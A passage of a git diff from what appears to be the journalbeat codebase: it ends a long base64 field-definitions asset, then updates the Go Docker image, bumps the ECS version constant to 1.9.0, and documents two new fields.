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" } diff --git a/journalbeat/Dockerfile b/journalbeat/Dockerfile index da708d84a56..ab9e7a4c3eb 100644 --- a/journalbeat/Dockerfile +++ b/journalbeat/Dockerfile @@ -1,4 +1,4 @@ -FROM golang:1.15.9 +FROM golang:1.15.10 RUN \ apt-get update \ diff --git a/journalbeat/cmd/root.go b/journalbeat/cmd/root.go index 50ded0ee692..7f8dfcfe3b4 100644 --- a/journalbeat/cmd/root.go +++ b/journalbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "journalbeat" // ecsVersion specifies the version of ECS that Winlogbeat is implementing. - ecsVersion = "1.8.0" + ecsVersion = "1.9.0" ) // withECSVersion is a modifier that adds ecs.version to events. diff --git a/journalbeat/docs/fields.asciidoc b/journalbeat/docs/fields.asciidoc index 9ba42f62289..db766dd7ca0 100644 --- a/journalbeat/docs/fields.asciidoc +++ b/journalbeat/docs/fields.asciidoc @@ -88,6 +88,15 @@ type: keyword -- +*`user_agent.device.type`*:: ++ +-- +Type of device where the user agent is running. + +type: keyword + +-- + [[exported-fields-cloud]] == Cloud provider metadata fields @@ -1171,6 +1180,17 @@ example: Montreal -- +*`client.geo.continent_code`*:: ++ +-- +Two-letter code representing continent's name. + +type: keyword + +example: NA + +-- 